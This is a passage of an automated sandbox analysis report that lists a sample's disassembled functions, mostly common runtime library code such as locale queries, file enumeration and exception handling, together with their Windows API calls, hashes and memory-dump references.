                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                          • Opcode ID: 32658b2194bb7920806d6751691132cb2ba9569a1429e45da6016c7740d0e58a
                                                                                                                                                                                                                                                                          • Instruction ID: e5e5c71482189e79a202fb501d2e58d72bad5e962907eef135eeb6928ebbc350
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32658b2194bb7920806d6751691132cb2ba9569a1429e45da6016c7740d0e58a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2D20571E082298BDF65DE28DD407EAB7B5FB84315F1841EAD40DE7240EB79AE818F41
                                                                                                                                                                                                                                                                          Function 00895DD3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,008957A4,00000002,00000000,?,?,?,008957A4,?,00000000), ref: 00895E6C
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,008957A4,00000002,00000000,?,?,?,008957A4,?,00000000), ref: 00895E95
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,008957A4,?,00000000), ref: 00895EAA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 94ec411294fb939455e31950cc9efa7f4abb990b4da175028c329cf380a57ef1
                                                                                                                                                                                                                                                                          • Instruction ID: 4dd49cd13aca9d848ae5250d23ea7487b3642311b877c36c74e9ed97df8d4245
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94ec411294fb939455e31950cc9efa7f4abb990b4da175028c329cf380a57ef1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C216072A00904AAEF26AF55C904AAF73A6FB54F54B5E8424E90ADB500E733DF41C790
                                                                                                                                                                                                                                                                          Function 0089566E Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00895776
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 008957B4
                                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 008957C7
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0089580F
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0089582A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 415426439-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2f5f085a59c0fc3b687805263b573d76d18dd92ba71e70908eb55150ca52ec5e
                                                                                                                                                                                                                                                                          • Instruction ID: 92eb5ecabd7da23b356b22ae3b174de0701f44197c38f0b1960c4070b8c5b2df
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f5f085a59c0fc3b687805263b573d76d18dd92ba71e70908eb55150ca52ec5e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C515F71A00609EFEF12EFA8CC45ABE77B8FF45700F1C4469A911E7691EB709A44CB61
                                                                                                                                                                                                                                                                          Function 0088E930 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 940c0e5d6642d71f3349d6853f9f47a4d852d201499cf18fcd482ab34cbb11e5
                                                                                                                                                                                                                                                                          • Instruction ID: 5cc9fbc377a8edd18052cd309e2491e7e5261e33df1ea5397c964cc53598f3eb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 940c0e5d6642d71f3349d6853f9f47a4d852d201499cf18fcd482ab34cbb11e5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06023A71E012199FDF14DFA8C9806AEBBF1FF48324F258269E919E7381D731A945CB90
                                                                                                                                                                                                                                                                          Function 008963B5 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008964A5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                          • Opcode ID: 761cfd29a84b820f7f379a6301cd2b85421eb09c82667c30dfa32ea3f5e5bcd8
                                                                                                                                                                                                                                                                          • Instruction ID: de62bcfd6dbb507daa0bc9afc55286812e010e5a0c78df76a3c8fe22f7d1cb50
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 761cfd29a84b820f7f379a6301cd2b85421eb09c82667c30dfa32ea3f5e5bcd8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A171F2B1C05169AFDF21BF688C89ABEBBB8FB05304F1841D9E009D3211EB318E949F15
                                                                                                                                                                                                                                                                          Function 00884073 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0088407F
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0088414B
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00884164
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0088416E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                                          • Opcode ID: 56faaa7fb1a4a986132fa81e201d9031a247fb080bfc937a0b43ff3d302af080
                                                                                                                                                                                                                                                                          • Instruction ID: 23cf10d9ceef9fbd6bb6503d3d26e2fc021b1499f231d1551b0cddc67ad3abd7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56faaa7fb1a4a986132fa81e201d9031a247fb080bfc937a0b43ff3d302af080
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE31F776D012199BDB20EFA4D9897CDBBB8FF18300F1041AAE50DAB250EB759A84DF45
                                                                                                                                                                                                                                                                          Function 0089595A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 008959AE
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 008959F8
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00895ABE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 661929714-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6e4943a1874367d151df2616fb940ba8069f25f92b7d462298cf2ac93812066c
                                                                                                                                                                                                                                                                          • Instruction ID: b58f2982537a63643150e546daac7184ae615a0912f22a7984be9da5e017b9e8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e4943a1874367d151df2616fb940ba8069f25f92b7d462298cf2ac93812066c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2619071A00A179FDF2AAF28CCD2BBA77A8FF04320F184169E905C6585E774D981CB54
                                                                                                                                                                                                                                                                          Function 0088CDB0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0088CEA8
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0088CEB2
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0088CEBF
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7aa8394a627e9a56e2b8eea96a7069f76369a07ca5d5df15f84496ef9fd0b648
                                                                                                                                                                                                                                                                          • Instruction ID: dab67a28f58c2d70b011fe8fd84d82bd2846c92d5475a224fdcdb6c13a518d03
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aa8394a627e9a56e2b8eea96a7069f76369a07ca5d5df15f84496ef9fd0b648
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F31D17594122CABCB21EF28DC8878DBBB8FF18310F5041EAE50CA7251EB309B858F45
                                                                                                                                                                                                                                                                          Function 008847EF Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,00883918,0088386B,?,?,?,?,0088386B,?,00000000,?,0087B20C,?,?,0087D57E), ref: 00884827
                                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,A9416E27,?,?,008A0227,000000FF,?,00884534,?,?,?,?,00884558,00000000,?), ref: 0088482B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Time$FileSystem$Precise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 743729956-0
                                                                                                                                                                                                                                                                          • Opcode ID: 67b497967d61b172096fbbd1df2d006d08baff06865e7204b06a0aa9b7121791
                                                                                                                                                                                                                                                                          • Instruction ID: 0d7726a245cbe9753a2b1081b7a74986188d7881cb2521cbd37a7b09180b0026
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67b497967d61b172096fbbd1df2d006d08baff06865e7204b06a0aa9b7121791
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AF06577904658EFD705AF44EC45B6DB7A8F709B24F00462AE912D3F90DB356900CBD0
                                                                                                                                                                                                                                                                          Function 00899C73 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00899BCE,?,?,00000008,?,?,008A005B,00000000), ref: 00899EA0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                          • Opcode ID: 70e9de4a2ad3bacbc31b3e7305aa7b8884e31d4beb6a795fd7dcf4218d0144c3
                                                                                                                                                                                                                                                                          • Instruction ID: 646c2e1e7a890f2eec983459f7a21c08ef17a1d7dc21d993d347bc9aa36a38ac
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70e9de4a2ad3bacbc31b3e7305aa7b8884e31d4beb6a795fd7dcf4218d0144c3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8B1E6316106099FDB19DF2CC48AB657BA0FB45364F29869CE8DACF2A1C735E991CB40
                                                                                                                                                                                                                                                                          Function 00883CDF Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00883CF5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                          • Opcode ID: e102f7ee765184fe89d2ba1290dbb8b5b3b78edd56a5fcd90e1fe62cdcd11a96
                                                                                                                                                                                                                                                                          • Instruction ID: 356d9af88896ad784e0624507ad6c8eb3209236070d297268dbbee562c3614e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e102f7ee765184fe89d2ba1290dbb8b5b3b78edd56a5fcd90e1fe62cdcd11a96
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EA16FB29027158FEB18CF64D8857AEBBF0FB49724F149A2AD412EBA60D3349941CF50
                                                                                                                                                                                                                                                                          Function 00896304 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00891797: HeapAlloc.KERNEL32(00000008,00001000,?,?,008908B1,00000001,00000364,?,00000006,000000FF,?,?,0088C669,00890504), ref: 008917D8
                                                                                                                                                                                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008964A5
                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00896599
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 008965D8
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0089660B
                                                                                                                                                                                                                                                                          Memory Dump Source
